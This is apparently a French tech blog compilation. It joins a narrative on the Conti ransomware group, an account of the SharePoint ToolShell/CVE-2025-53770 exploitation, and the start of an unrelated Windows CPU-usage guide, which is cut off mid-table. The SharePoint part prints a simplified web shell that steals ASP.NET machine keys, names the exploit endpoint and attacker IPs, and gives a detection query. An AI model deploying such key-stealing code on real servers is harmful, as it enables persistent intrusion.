Et les victimes de Conti, c’est un who’s who du malheur numérique… Hôpitaux, universités, municipalités, entreprises du CAC 40… Personne n’est épargné. J’en veux pour preuve l’attaque contre le Health Service Executive (HSE) irlandais en mai 2021 qui restera dans les annales avec 80% du système informatique du service de santé national irlandais paralysé du jour au lendemain. 54 des 58 hôpitaux existants ont été touchés. Les médecins obligés de revenir au papier et au stylo, les IRM et scanners hors service, les dossiers patients inaccessibles, des opérations chirurgicales reportées, des chimiothérapies retardées, des ambulances détournées. Bref, un chaos total qui a duré des semaines.
Et le coût total pour l’Irlande ? Plus de 100 millions d’euros en dommages directs, et potentiellement 600 millions en incluant la remédiation et le renforcement de la sécurité. Et tout ça pourquoi ? Parce que le HSE a courageusement refusé de payer les 20 millions de dollars de rançon demandés. Respect pour le principe, mais la facture finale a fait mal. Très mal.
Et des mois après l’attaque, certains systèmes n’étaient toujours pas restaurés.
Quand les ransomwares s’attaquent aux hôpitaux, ce sont des vies qui sont en jeu
Mais l’attaque la plus spectaculaire, celle qui restera dans les livres d’histoire, c’est l’assaut contre le Costa Rica en avril-mai 2022 dont je vous parlais juste avant. Le 17 avril, premier coup de semonce : le ministère des Finances costaricain est frappé. Les systèmes de déclaration d’impôts et de douanes sont KO. Puis c’est l’escalade… ministère du Travail le 27 avril, puis Sécurité sociale, Sciences et Technologies, Fonds de développement social… Et en quelques semaines, c’est 27 institutions gouvernementales qui sont touchées, dont 9 complètement paralysées. Le pays ne peut littéralement plus fonctionner.
Face à cette cyberattaque d’une ampleur sans précédent, le président Rodrigo Chaves n’a alors pas d’autres choix et le 8 mai 2022, il fait une déclaration historique : État d’urgence national pour cause de cyberattaque. C’est la première fois dans l’histoire de l’humanité qu’un pays entier se retrouve en état d’urgence à cause de hackers. L’économie est paralysée, les exportations bloquées (le Costa Rica exporte pour 12 milliards de dollars par an), et les services publics à l’arrêt complet. Les experts estiment que chaque jour de crise coûte 30 à 38 millions de dollars au pays et en 3 semaines, cela représente près d’un milliard de dollars de pertes.
Costa Rica : première nation victime d’une cyber-guerre déclarée
Mais Conti ne s’arrête pas là. Dans un délire mégalomaniaque total, ils appellent carrément au renversement du gouvernement costaricain ! Sur leur site accessible via Tor, ils publient ceci : “Nous avons décidé de renverser le gouvernement par cyberattaque, nous avons nos raisons. Nous demandons aux citoyens du Costa Rica de faire pression sur leur gouvernement, sinon nous continuerons nos attaques.” Du jamais vu. Un gang de ransomware qui se prend pour une force révolutionnaire et menace la stabilité d’un État souverain. On n’est plus dans le cybercrime, on est dans le cyberterrorisme d’État.
La réaction internationale est alors immédiate. Le Département d’État américain sort l’artillerie lourde avec 15 millions de dollars de récompense : 10 millions pour des informations sur l’identité et la localisation des leaders de Conti, 5 millions supplémentaires pour toute info menant à des arrestations. C’est la plus grosse prime jamais offerte pour des cybercriminels, dépassant même certaines primes pour des terroristes. Le FBI mobilise des dizaines d’agents, Interpol émet des notices rouges, bref c’est une énorme chasse à l’homme qui démarre.
10 millions de dollars - Quand ta tête vaut plus cher qu’un yacht de luxe
Et pendant ce temps, c’est business as usual chez Conti. Les fuites qui ont eu lieu après coup en 2022 révèlent des conversations internes absolument surréalistes. On découvre le quotidien banal du crime organisé moderne. “Mango se plaint que son équipe pentest n’est pas assez productive, il demande l’autorisation de virer Tortik”, “Stern veut un rapport détaillé sur les métriques du Q3 avant jeudi”, “Professor organise une formation obligatoire lundi sur les nouvelles techniques d’évasion EDR”, “Le département compta signale un retard dans le paiement des salaires de novembre à cause de la volatilité du Bitcoin”… On se croirait dans les emails corporate de n’importe quelle entreprise, sauf qu’on parle de criminels qui détruisent des vies.
Et leurs problèmes RH sont particulièrement savoureux. Un manager se plaint : “Les devs veulent tous passer sur l’équipe crypto parce que c’est mieux payé, mais j’ai besoin d’eux pour patcher le ransomware !” Un autre : “Bentley a encore raté le daily standup ce matin, c’est la 3ème fois ce mois-ci, on fait quoi ?” Ou encore : “Les nouveaux refusent de bosser le weekend sans prime, c’est n’importe quoi, de mon temps on était motivés !” Y’a même des discussions sur la mise en place d’un système de congés payés et de RTT. Du grand n’importe quoi.
Les documents fuités incluent leur fameux “playbook”, le manuel d’opération intégral donné aux nouveaux affiliés. 435 pages en russe (les fuites contenaient plusieurs versions) qui détaillent absolument tout : Comment utiliser Cobalt Strike (avec une licence crackée fournie), comment identifier les cibles prioritaires dans un Active Directory, les 10 commandements de la négociation de rançon, comment blanchir les bitcoins via Monero, les erreurs de débutant à éviter… C’est tellement détaillé et bien fait qu’un amateur motivé pourrait suivre les instructions et lancer une attaque ransomware professionnelle.
Le playbook révèle également leur arsenal technique complet. Outre l’incontournable Cobalt Strike, on y trouve : Metasploit et Armitage pour l’exploitation, BloodHound et SharpHound pour mapper l’AD, Mimikatz et LaZagne pour les mots de passe, PrintNightmare et ZeroLogon pour l’escalade de privilèges, rclone et WinSCP pour l’exfiltration… Ils ont même développé leurs propres outils custom : ContiLocker (le ransomware), ContiLeaks (pour l’exfil), ContiNegotiator (un chatbot pour les négociations !). Une vraie usine à malwares.
Cobalt Strike 4.3 en version crackée par Conti
Et les vulnérabilités exploitées sont soigneusement cataloguées avec leur niveau de fiabilité. ZeroLogon (CVE-2020-1472) : “Fonctionne dans 95% des cas, privilégier sur les DC Windows 2012-2019”. PrintNightmare (CVE-2021-34527) : “Excellent pour l’escalade locale, attention aux patchs de juillet 2021”. ProxyShell/ProxyLogon : “Cible Exchange, très efficace, permet installation directe du webshell”. EternalBlue (MS17-010) : “Vieux mais gold, encore présent sur 30% des réseaux”. Ils ont même un système de notation des exploits de 1 à 5 étoiles, comme sur Amazon.
Mais ce qui ressort le plus des fuites, c’est aussi cet aspect “corporate dystopique” de l’organisation. Les discussions sur les augmentations de salaire ("Rescator mérite ses 8000$/mois, il a ramené 3 grosses victimes ce trimestre"), les formations obligatoires ("Rappel : webinar sur OPSEC jeudi 15h heure de Moscou, présence obligatoire"), les conflits entre équipes ("L’équipe de Baget refuse de partager ses accès avec nous, c’est du sabotage"), les réorganisations ("Suite au départ de Tramp, fusion des équipes Pentest-1 et Pentest-3")… C’est The Office version cybercrime.
Y’a même des discussions hallucinantes sur la “culture d’entreprise”. Un manager RH propose d’organiser des “team buildings virtuels” pour améliorer la cohésion. Un autre suggère de créer un channel #random sur Jabber pour que les employés puissent “socialiser” et parler d’autre chose que de crime. Quelqu’un propose même d’organiser un tournoi de CS:GO inter-équipes. “Ça renforcera l’esprit de compétition saine”, dit-il. On croit rêver…
Mais tout ce bel édifice criminel va s’effondrer comme un château de cartes le 25 février 2022 car ce jour-là, c’est le lendemain de l’invasion russe en Ukraine, et Conti commet l’erreur fatale qui va signer son arrêt de mort. Ils publient sur leur site un communiqué de soutien inconditionnel à la Russie : “Le groupe Conti annonce officiellement son soutien total au gouvernement russe. Si quelqu’un décide d’organiser une cyberattaque ou toute activité de guerre contre la Russie, nous utiliserons toutes nos ressources pour riposter sur les infrastructures critiques de l’ennemi.”
En une phrase, ils viennent de politiser leur business et de se mettre une cible géante sur le dos.
Et la réaction ne se fait pas attendre puisque le 27 février, à peine 48 heures plus tard, un compte Twitter anonyme @ContiLeaks commence à balancer. Et pas qu’un peu. Le leaker signe chaque message “Slava Ukraini!” (Gloire à l’Ukraine). Il s’agit d’un membre ukrainien du groupe, révolté par la prise de position pro-Kremlin, qui décide alors de tout balancer. Un véritable Snowden du crime organisé. Et il a accès à TOUT.
L’ampleur de la fuite est absolument monumentale. 60 694 messages internes, soit 393 fichiers JSON compressés. Des conversations qui s’étalent de janvier 2021 à février 2022. Plus de 100 000 fichiers au total incluant le code source, les manuels, les outils, les bitcoins wallets, les vrais noms… C’est Wikileaks puissance 10. Les experts en sécurité parlent immédiatement des “Panama Papers du ransomware”. Jamais dans l’histoire du cybercrime on n’avait eu accès à autant d’informations internes sur un groupe criminel en activité.
ContiLeaks : quand 60 000 messages privés deviennent publics
Et les révélations sont absolument explosives. On découvre par exemple les liens avec le FSB russe (une conversation d’avril 2021 mentionne explicitement un financement FSB et leur intérêt pour des documents Bellingcat sur Navalny). On apprend les vrais noms derrière les pseudos. Les montants exacts des rançons (2,7 millions payés par Broward County, 1,1 million par Advantech, 5,5 millions par JBS…). Les disputes internes ("Pumba a volé 50k$ de la cagnotte commune", “Target refuse de payer sa part au développeur”). Les techniques secrètes. Les victimes non déclarées et les projets futurs, notamment qu’ils préparaient “Conti 2.0” avec des capacités de ver auto-réplicant. Un trésor pour les enquêteurs.
On découvre aussi des anecdotes croustillantes qui montrent le côté humain (si on peut dire) de ces criminels. Un membre se plaint d’avoir touché seulement 15 000 dollars pour une attaque qui a rapporté 2 millions ("C’est de l’exploitation !" dit-il). Un autre raconte comment il a failli se faire griller par sa femme qui a trouvé bizarre ses horaires décalés et ses revenus inexpliqués. Un troisième demande des conseils fiscaux : “Comment je déclare 500k$ de gains crypto sans me faire gauler ?” Les réponses sont hilarantes : “Dis que t’as investi dans le Dogecoin mdr”.
Les fuites révèlent également l’ampleur financière vertigineuse de l’opération. En 2021 uniquement, Conti a généré 180 millions de dollars de revenus bruts. Les analyses blockchain des wallets exposés montrent des mouvements de fonds massifs. Un transfert de 85 000 dollars de “Stern” vers “Mango” pour payer les salaires de décembre. 2,3 millions transférés vers un mixer Monero en une seule transaction. Des dizaines de wallets avec des soldes à 6 ou 7 chiffres. La fortune totale du groupe est estimée à plus de 2 milliards de dollars en crypto au moment des fuites.
Les analystes découvrent que ces 180 millions se répartissent ainsi : environ 30% (54 millions) pour le “core team” Conti, 70% (126 millions) redistribués aux affiliés et employés. Mais attention, c’est du brut. Après les coûts opérationnels (infrastructures, corruption, blanchiment qui coûte 20-30%), le profit net du groupe tourne autour de 30-40 millions par an. Pas mal pour une “startup” criminelle de 150 personnes.
Malgré l’hémorragie des fuites, Conti tente alors de continuer. Le leaker ukrainien publie de nouvelles conversations “fraîches” en mars, montrant la panique interne. Les membres s’accusent mutuellement d’être la taupe, la paranoïa explose. “C’est forcément quelqu’un du département négociation”, “Non, ça vient de l’équipe dev, ils ont accès à tout”, “Je parie sur ce fdp de Hardy, il a toujours été louche”. Certains membres clés disparaissent du jour au lendemain. L’ambiance devient toxique, irrespirable.
Les autorités mondiales profitent alors de ce chaos pour resserrer l’étau et le 10 février 2023, les États-Unis et le Royaume-Uni frappent fort avec des sanctions contre 7 Russes identifiés grâce aux fuites : Gel des avoirs, interdiction de transactions, inscription sur les listes noires internationales. Les banques crypto commencent à bloquer les adresses liées à Conti. Même les exchangers louches du darknet refusent de toucher à leurs bitcoins. La pression devient insoutenable.
Et le 19 mai 2022, c’est fini. Les sites de Conti disparaissent d’Internet. Le blog “wall of shame” qui listait les cibles, le site de négociation, les serveurs C2, toute l’infrastructure publique s’évanouit en quelques heures. Le leader du chat interne poste un dernier message : “C’était un honneur de servir avec vous. Bonne chance pour la suite.” Puis plus rien. Après deux ans et demi d’activité, après avoir généré des centaines de millions et causé des milliards de dégâts, le rideau tombe sur Conti. Une chute spectaculaire pour celui qui fut le roi incontesté du ransomware.
Mais est-ce vraiment la fin ? Les experts sont unanimes : Non.
Wizard Spider n’a pas disparu, il s’est juste dispersé façon puzzle. En effet, des analyses post-mortem suggèrent que Conti s’est fragmenté en au moins une dizaine de nouveaux groupes. Black Basta (qui cartonne depuis mi-2022), Royal/BlackSuit, Karakurt, BlackByte, et d’autres opérations sans nom. C’est l’hydre de la mythologie… tu coupes une tête, dix repoussent. Sauf qu’au lieu d’une organisation centralisée, on a maintenant une constellation de groupes autonomes, plus petits, plus agiles, plus difficiles à traquer.
Les anciens de Conti ont aussi essaimé dans l’écosystème criminel global. On retrouve leurs techniques, leurs outils, leur philosophie dans des dizaines d’autres opérations. LockBit a recruté plusieurs ex-Conti. ALPHV/BlackCat compte d’anciens négociateurs Conti dans ses rangs. Le playbook Conti est devenu la bible du ransomware moderne, téléchargé et étudié par tous les apprentis cybercriminels. L’héritage de Conti vit, se transforme, mute. Comme un virus.
Quant à Vitaly Kovalev, le mystérieux cerveau derrière toute l’opération ? Et bien il court toujours. Les autorités allemandes ont confirmé son identité en 2024 et estiment qu’il vit quelque part entre Moscou et Saint-Pétersbourg. Avec sa fortune en crypto estimée à 500 millions de dollars minimum (probablement plus proche du milliard aujourd’hui avec la hausse du Bitcoin), il a les moyens de rester planqué très longtemps. Nouveaux papiers, chirurgie esthétique, protection rapprochée, résidences multiples… La Russie n’extradant pas ses citoyens, surtout quand ils ont possiblement des liens avec les services, alors Kovalev peut dormir tranquille. Pour l’instant.
Moscou - Le refuge doré des cybercriminels milliardaires
Du coup, qu’est-ce qu’on retient de cette histoire de dingue ?
D’abord, le cybercrime s’est professionnalisé à un niveau qu’on n’imaginait même pas. Ces groupes fonctionnent exactement comme des multinationales, avec leurs process, leurs KPIs et leurs départements spécialisés. Mais le plus inquiétant, c’est qu’ils se politisent… ils prennent position dans des guerres, menacent de renverser des gouvernements démocratiques et entretiennent des liens avec les services de renseignement. On est passé du simple banditisme numérique à une forme de guerre hybride où les criminels deviennent des mercenaires numériques.
Les dommages causés par Conti donnent également le vertige. On parle de minimum 2 milliards de dollars en dégâts directs, mais si on ajoute l’indirect, on monte facilement à 10 milliards. Des hôpitaux ont été paralysés, des PME ont mis la clé sous la porte, des infrastructures critiques ont été fragilisées. L’impact va bien au-delà du financier. Et le modèle RaaS qu’ils ont perfectionné a complètement changé la donne. Aujourd’hui, n’importe quel apprenti hacker peut louer un ransomware sur le darknet et lancer des attaques. C’est l’uberisation totale du cybercrime, et cette accessibilité fait froid dans le dos.
Heureusement, les entreprises ont tiré des leçons. Les budgets cybersécurité ont explosé, dépassant les 200 milliards en 2024, et les bonnes pratiques comme les sauvegardes 3-2-1 se généralisent. Mais c’est une course sans fin car les nouveaux groupes issus de Conti utilisent déjà l’IA, achètent des 0-days et corrompent des employés en interne.
Paradoxalement, les fuites de Conti ont aussi été une aubaine pour la communauté InfoSec car pour la première fois, on a pu étudier de l’intérieur le fonctionnement d’un gang majeur de cybercriminels, ce qui a permis de développer de nouvelles défenses et de procéder à plusieurs arrestations. Mais ces fuites ont aussi révélé la fragilité de ces empires criminels : un seul membre mécontent et une déclaration politique mal placée ont suffi à faire s’écrouler toute l’organisation.
L’histoire de Conti restera comme le moment où des hackers anarchistes sont devenus des businessmen, où le ransomware est passé de l’artisanat à l’industrie lourde, et où la cybercriminalité s’est dangereusement mêlée de géopolitique. Et pendant ce temps, Stern sirote probablement un cocktail sur une plage de Sotchi, consultant le cours de ses +500 millions en crypto tout en se moquant de ceux qui le cherchent encore. Le crime paie, très bien même. Du moins, tant qu’on évite de tweeter son soutien à Poutine.
Alors la prochaine fois que votre équipe IT vous tanne pour une mise à jour, souvenez-vous qu’il existe des organisations criminelles avec des centaines d’employés et des millions en R&D, dont le seul but est de transformer votre infrastructure en machine à bitcoins.
Allez, même si tous les médias vous gavent avec ça ces derniers jours, je vais quand même vous raconter l’histoire de la CVE-2025-53770, une faille SharePoint qui fait actuellement trembler Internet.
On est le 18 juillet dernier, c’est vendredi matin. Je suis tranquille posé en Bretagne, devant mon petit café, en train de scroller mes flux RSS comme d’hab. Et là, BAM ! Je vois un tweet d’un chercheur néerlandais qui me fait recracher mon café : “Quelque chose de très mauvais se passe avec SharePoint. Vérifiez vos logs. MAINTENANT.”
Du coup, je me dis “encore un qui a fumé la moquette”. Mais non. C’était le début d’une histoire qui commence avec un mec vietnamien super balèze, qui continue avec des hackers chinois vénères, et qui se finit avec des milliers d’entreprises qui chialent…
Mais pour vraiment comprendre ce bordel actuel, faut qu’on remonte le temps. Direction Berlin, mai 2025 pour le Pwn2Own. Cet événement, c’est LE truc où les meilleurs hackers du monde viennent casser du code pour de la thune. Les Jeux Olympiques du hacking si vous préférez, mais en plus stylé et sans le dopage. Dans la salle bondée, y’a un jeune vietnamien qui se pointe avec son laptop tout pourri. Son nom est Dinh Ho Anh Khoa, alias @_l0gg sur Twitter.
Le mec bosse pour Viettel Cyber Security, et c’est pas son premier rodéo mais cette fois, il a un truc de malade dans sa besace. Pendant des mois, ce génie a étudié SharePoint, vous savez, le machin de Microsoft que toutes les boîtes utilisent pour stocker leurs docs et faire semblant d’être organisées.
Et là, attention les yeux, en quelques minutes, Khoa déboîte complètement un serveur SharePoint. Sans mot de passe, sans rien. Juste avec UNE SEULE requête HTTP. Mdr ! Le jury n’en peut plus, et les autres participants sont sur le cul.
Comment a-t-il fait ? Et bien c’est simple (enfin, façon de parler). Il enchaîne deux bugs :
Le premier (CVE-2025-49706) qui dit “Salut SharePoint, c’est moi ton admin, laisse-moi passer” et SharePoint le croit !
Le second (CVE-2025-49704) qui permet d’écrire des fichiers où on veut sur le serveur
Résultat des courses, 100 000 dollars dans la popoche, 10 points Master of Pwn, et une standing ovation !! L’équipe Viettel finit alors avec un score parfait de 15,5/15,5. Ils sont deuxièmes au général, mais franchement, c’est la classe.
Plus tard, Khoa tweete avec la modestie d’un champion : “L’exploit nécessite une seule requête. Je l’appellerais ToolShell, ZDI a dit que l’endpoint était /ToolPane après tout.” Le mec vient de péter SharePoint et il fait des jeux de mots. J’adore.
SharePoint en PLS face à l’exploit de Khoa
Bon, maintenant on fait un petit saut dans le temps. On est le 14 juillet et Microsoft a sorti des patchs pour ces deux vulnérabilités. Tout le monde pense que c’est réglé. Spoiler alert : c’est pas réglé du tout.
Dans les bureaux de Code White GmbH en Allemagne, l’ambiance est électrique car les mecs viennent de faire un truc de ouf ! Ils ont reproduit l’exploit de Khoa et pas qu’un peu !
“Nous avons reproduit ‘ToolShell’, la chaîne d’exploit non authentifiée pour CVE-2025-49706 + CVE-2025-49704 utilisée par @_l0gg pour faire tomber SharePoint à #Pwn2Own Berlin 2025, c’est vraiment juste une requête !”, postent-ils sur Twitter, tout fiers.
Sauf que voilà, Code White c’est des gentils, mais dans l’ombre, y’a des méchants qui prennent des notes. Et eux, ils ne vont pas se contenter de twitter leur exploit…
Amsterdam, 18 juillet, 20h47. Les mecs d’Eye Security, une boîte néerlandaise spécialisée dans la détection de menaces, sont en train de surveiller Internet (ouais, c’est leur taf, surveiller TOUT Internet…). Un de leurs analystes lève la tête de son écran : “Euh les gars, j’ai des centaines de requêtes POST bizarres vers /layouts/15/ToolPane.aspx sur plein de serveurs SharePoint différents. Et le header Referer c’est /layouts/SignOut.aspx. C’est complètement con comme truc.”
Bah oui c’est con. Personne ne se déconnecte via ToolPane. C’est comme si on passait par la fenêtre pour sortir de chez soit alors que la porte est ouverte. Sauf que là, c’est pas pour sortir, c’est pour rentrer…
L’équipe d’Eye Security vient alors de découvrir en live une des plus grosses campagnes de cyberattaque de l’histoire. Ce qu’ils voient, c’est l’exploitation d’une NOUVELLE vulnérabilité zero-day : la CVE-2025-53770. Les hackers ont trouvé comment contourner les patchs de Microsoft. C’est un game over total.
Les chercheurs bossent alors toute la nuit comme des malades. Ils scannent plus de 8000 serveurs SharePoint dans le monde et le constat est terrifiant :
17 juillet, 12h51 UTC : Première vague depuis 96.9.125.147 (des tests apparemment)
18 juillet, 18h06 UTC : LA GROSSE VAGUE depuis 107.191.58.76 (ça cartonne sévère)
19 juillet, 07h28 UTC : Rebelote depuis 104.238.159.149
“C’était comme regarder un tsunami en temps réel”, racontera quelques jours plus tard un chercheur. “On voyait des dizaines de serveurs tomber toutes les heures. Et on pouvait rien faire à part regarder et prendre des notes.”
Mais alors qu’est-ce que les hackers déploient sur ces serveurs ? Et bien un truc très vicieux nommé spinstall0.aspx. Derrière ce nom tout pourri se cache une backdoor d’une ingéniosité diabolique car contrairement aux web shells classiques qui vous permettent d’exécuter des commandes (genre “del C:*.*” pour les nostalgiques du DOS), spinstall0.aspx n’a qu’UN SEUL but : voler les clés cryptographiques du serveur SharePoint.
Pour les non-techos, j’vous explique. Les clés crypto de SharePoint, c’est comme le moule pour fabriquer un pass pour votre immeuble. Une fois que vous avez le moule de ce pass, vous pouvez faire autant de doubles que vous voulez et même si le proprio d’un appart change sa serrure, vous avez toujours le moule pour faire des pass, donc vous pouvez l’ouvrir.
Techniquement, ça ressemble à ça (version simplifiée pour pas vous faire peur) :
// spinstall0.aspx - Le cauchemar de tout admin SharePoint
using System.Web;
using System.Reflection;
// On charge les trucs secrets de Windows
Assembly assembly = Assembly.Load("System.Web");
// On utilise la magie noire de la réflexion .NET
MethodInfo getConfig = assembly.GetType("System.Web.Configuration.MachineKeySection")
.GetMethod("GetApplicationConfig", BindingFlags.NonPublic | BindingFlags.Static);
// On pique les clés crypto
MachineKeySection config = (MachineKeySection)getConfig.Invoke(null, null);
// Et hop, on les affiche tranquille
Response.Write("ValidationKey: " + config.ValidationKey);
Response.Write("DecryptionKey: " + config.DecryptionKey);
// Bisous, on se revoit plus tard avec vos clés ;)
Les chercheurs de Check Point ont identifié les signatures SHA256 du malware (pour ceux qui veulent jouer aux détectives) :
Hé oui, ils utilisent encore les noms courts DOS. En 2025, c’est ça le niveau expert !
22 juillet, Redmond, Washington. Vous vous en doutez, chez Microsoft c’est la panique totale. Le MSRC (Microsoft Security Response Center) est en mode DEFCON 1 et les mecs dorment plus et ne mangent plus…non, ils codent et analysent H24 tout ce qui se passe.
Et là, les analystes du Microsoft Threat Intelligence font une découverte qui fout les jetons… Ce ne sont pas des script kiddies qui attaquent. C’est carrément des groupes étatiques chinois. Du lourd. Du très lourd.
Microsoft identifie ainsi 3 acteurs principaux (ils leur donnent des noms de typhons, c’est plus classe que “Hacker Chinois N°3”) :
Linen Typhoon (alias APT27 ou Emissary Panda) : Ces mecs sont dans le game depuis 2012 et leur spécialité c’est de voler de la propriété intellectuelle. Ils adorent taper dans les ambassades et les organisations gouvernementales. Bref, ils veulent savoir ce que tout le monde mijote.
Violet Typhoon : Apparus en 2015, ces gars ciblent les anciens militaires, les ONG, les think tanks et les universités. Et leur kiff c’est de collecter du renseignement. Ils veulent savoir qui pense quoi et qui fait quoi.
Storm-2603 : Ce sont les plus mystérieux du lot. Basés en Chine mais sans liens connus avec d’autres groupes, ces mecs déploient parfois des ransomwares Warlock et Lockbit. Il sont mi-espions, mi-rançonneurs. Dans le pire des deux mondes, quoi.
“C’est la première fois qu’on voit 3 groupes d’État-nation différents exploiter la même zero-day en même temps”, confie un analyste Microsoft. “D’habitude ils se marchent sur les pieds, là ils étaient coordonnés. C’est flippant.”
19 juillet, minuit. Chez Microsoft c’est toujours la course contre la montre car chaque heure qui passe, c’est des dizaines de nouveaux serveurs pwned. La pression est énorme. Les devs sont s, les managers pètent des câbles, et le PDG appelle toutes les heures. Le problème est complexe car la CVE-2025-53770 c’est pas juste un bug, c’est un contournement des patchs précédents.
L’équipe SharePoint bosse alors sur plusieurs fronts :
Comprendre comment le contournement fonctionne (spoiler : c’est tordu)
Développer un patch qui ne peut pas être contourné (cette fois promis juré ^^)
Tester sur TOUTES les versions de SharePoint (y’en a un paquet !)
Et préparer la doc et les outils (parce que personne lit jamais la doc mais bon…)
Mais pendant ce temps, les chiffres des compromissions explosent. The Washington Post rapporte que des agences fédérales US, des compagnies énergétiques, des universités prestigieuses et même des opérateurs télécom asiatiques se sont fait avoir. C’est le carnage total !!
20 juillet, dimanche matin. Microsoft fait un truc qu’ils ne font jamais : sortir des patchs un dimanche. Mais là c’est la guerre, alors il faut agir vite.
Et ils balancent tout d’un coup :
Un advisory officiel qui explique le bordel
Des patchs d’urgence pour toutes les versions (même les vieilles que personne devrait plus utiliser)
Une requête KQL pour détecter le malware dans Microsoft 365 Defender
Voici la requête KQL pour les curieux :
DeviceFileEvents
| where FolderPath has "MICROS~1\\WEBSER~1\\16\\TEMPLATE\\LAYOUTS"
| where FileName =~ "spinstall0.aspx" or FileName has "spinstall0"
| project Timestamp, DeviceName, InitiatingProcessFileName,
InitiatingProcessCommandLine, FileName, FolderPath,
ReportId, ActionType, SHA256
| order by Timestamp desc
// Si ça retourne des résultats, vous êtes dans la mouise
Mais Microsoft va plus loin car dans leur advisory, ils lâchent une bombe : “Appliquer les patches ne suffit pas. Vous DEVEZ changer vos clés ASP.NET et redémarrer IIS.”
Traduction : même si vous patchez, si les hackers ont déjà volé vos clés, vous êtes toujours dans la merde. Il faut donc tout changer… Les serrures ET les clés.
Le même jour, la CISA américaine ajoute la CVE-2025-53770 à sa liste des vulnérabilités activement exploitées. Les agences fédérales ont alors 24h pour patcher. Pour une administration, c’est comme demander à un escargot de courir un 100m. Et puis surtout c’est trop tard car le 21 juillet, des proof-of-concept apparaissent sur GitHub. N’importe quel gamin avec 2 neurones peut maintenant exploiter la faille. C’est Noël pour les script kiddies.
SentinelOne rapporte même que leurs honeypots (des faux serveurs pour attraper les hackers) détectent des MILLIERS de tentatives par heure. C’est l’apocalypse numérique. SOCRadar balance aussi des chiffres qui font mal. Et un simple scan Shodan révèle l’exposition mondiale :
États-Unis : 3 960 serveurs exposés (champions du monde !)
Iran : 2 488 serveurs (même sous sanctions ils ont SharePoint)
Malaisie : 1 445 serveurs (la surprise du chef)
Pays-Bas : 759 serveurs (ils hébergent tout le monde)
Au total, plus de 16 000 serveurs SharePoint sont exposés sur Internet et 8 000 sont vulnérables. Des banques, des hôpitaux, des gouvernements… Tout le monde y passe. Rapid7 sort également une analyse qui fait froid dans le dos : certaines organisations se sont fait compromettre en moins de 4 MINUTES après exposition. 4 minutes ! C’est le temps de se faire un café et boom, c’est hacké.
Alors qu’est-ce qu’on retient de ce bordel monumental ? Et bien plusieurs trucs importants :
La vitesse, c’est la vie : Entre le PoC de Code White (14 juillet) et l’exploitation massive (17 juillet), y’a que 3 jours. Dans le monde moderne, on n’a pas des semaines pour patcher. Ce sont des heures, max.
Les hackers innovent car voler les clés crypto au lieu d’installer un shell, c’est très malin. Ça montre que les attaquants pensent long terme car ils ne veulent pas juste entrer, ils veulent rester.
C’est de la géopolitique cyber car 3 groupes chinois qui bossent ensemble c’est du jamais vu encore. Le cyberespace est devenu un vrai champ de bataille entre les nations et nous, les couillons, on est au milieu.
Et surtout, les patchs c’est pas magique : La CVE-2025-53770 était un contournement des patchs précédents ce qui montre qu’installer les mises à jour c’est bien, mais c’est pas suffisant. Il faut aussi une défense en profondeur à savoir des patchs + du monitoring + de la segmentation + de nombreuses prières.
Et l’histoire n’est pas finie car pendant que j’écris ces lignes, des milliers d’organisations vérifient leurs logs en mode panique. Elles appliquent les patchs, changent leurs clés, et prient pour pas être dans la liste des victimes. Dinh Ho Anh Khoa, notre hacker vietnamien du début a même déclaré : “J’aurais jamais imaginé que ma découverte aurait de telles conséquences. Mon but c’était d’améliorer la sécurité, pas de déclencher une cyberguerre mondiale.”
Te tracasse pas trop mon gars, ça aurait fini par arriver de toute manière… Là au moins, on est au courant. Et surtout Microsoft a annoncé des changements majeurs dans SharePoint : Plus d’audits, une meilleure séparation des privilèges, et tout le tralala. On verra si ça suffit pour la prochaine fois.
Voilà, c’est ça Internet… On est tous connectés pour le meilleur et surtout pour le pire… Donc si vous bossez dans l’IT et que vous avez SharePoint, allez vérifier vos logs. Genre maintenant hein. Tout de suite là. Et changez vos clés crypto aussi. On sait jamais.
Votre ordinateur est lent, les ventilateurs tournent à plein régime, et tout semble figé ? Si votre processeur (CPU) est utilisé à 100 % en permanence, cela peut entraîner de graves ralentissements du système, voire des blocages complets.
un logiciel tiers qui consomme trop de ressources,
ou une configuration défaillante (pilotes obsolètes, services inutiles, corruption système…).
Dans ce guide, vous apprendrez :
à reconnaître les symptômes d’un CPU saturé,
à identifier les processus responsables,
et à appliquer des solutions efficaces pour retrouver un système fluide, sans formater.
Toutes les méthodes proposées sont compatibles avec Windows 11 et Windows 10, et vont du simple nettoyage jusqu’à la réinitialisation complète du système en cas de blocage persistant.
CPU à 100 % : comment reconnaître les symptômes et comprendre les causes
Lorsque le processeur (CPU) de votre ordinateur fonctionne en permanence à 100 %, cela impacte directement les performances globales du système. Le CPU est le cœur du PC : s’il est débordé, chaque action devient lente, même les plus simples comme ouvrir un dossier, taper du texte ou charger une page web.
Voici les signes les plus fréquents d’un processeur saturé :
Le PC devient lent, voire inutilisable, sans cause visible.
Les ventilateurs tournent en continu, signe que le CPU chauffe.
Le pointeur de souris devient saccadé ou se fige temporairement.
Le Gestionnaire des tâches (Ctrl + Maj + Échap) affiche une utilisation CPU à 100 %, même sans programme ouvert.
Le système met du temps à réagir aux clics ou aux raccourcis clavier.
Des micro-freezes, des ralentissements ou des décalages apparaissent en jeu ou lors de la lecture vidéo.
Un CPU à 100 % peut être causé par :
un processus système mal géré (ex. : svchost.exe, TiWorker.exe, MsMpEng.exe, etc.),
un logiciel tiers mal optimisé ou tournant en arrière-plan,
un pilote défectueux,
ou un logiciel malveillant.
Bon à savoir : sur les ordinateurs portables ou anciens PC, un processeur à 100 % peut aussi provoquer des surchauffes, une baisse d’autonomie et une usure prématurée du matériel.
Le premier réflexe est donc de repérer les processus qui utilisent le plus de CPU, puis d’en identifier la cause : service système mal optimisé, pilote défaillant, logiciel en boucle, malware, etc. C’est ce que nous allons voir dans les sections suivantes.
Processus système fréquents responsables d’un CPU élevé
Voici les processus Windows les plus fréquemment responsables d’une charge CPU anormale, avec leur rôle, symptômes, et solutions associées :
Processus
Nom système
Rôle principal
Symptômes
Solutions recommandées
svchost.exe
Service Host
Lance plusieurs services système (Windows Update, Audio, Réseau…)
CPU élevé sans raison claire, souvent lié à un sous-service
Identifier le service via le gestionnaire des tâches, isoler et désactiver si nécessaire
TiWorker.exe
Windows Modules Installer Worker
Gère l’installation des mises à jour système
CPU et disque saturés après redémarrage
Laisser travailler, exécuter sfc /scannow + DISM, réinitialiser Windows Update
MsMpEng.exe
Antimalware Service Executable (Windows Defender)
Analyse en temps réel des fichiers et processus
Pics CPU lors de l’analyse, ralentissements pendant usage
Désactiver l’analyse planifiée, exclure certains dossiers, ou passer à un autre antivirus
wmiprvse.exe
WMI Provider Host
Fournit des infos système à d’autres programmes
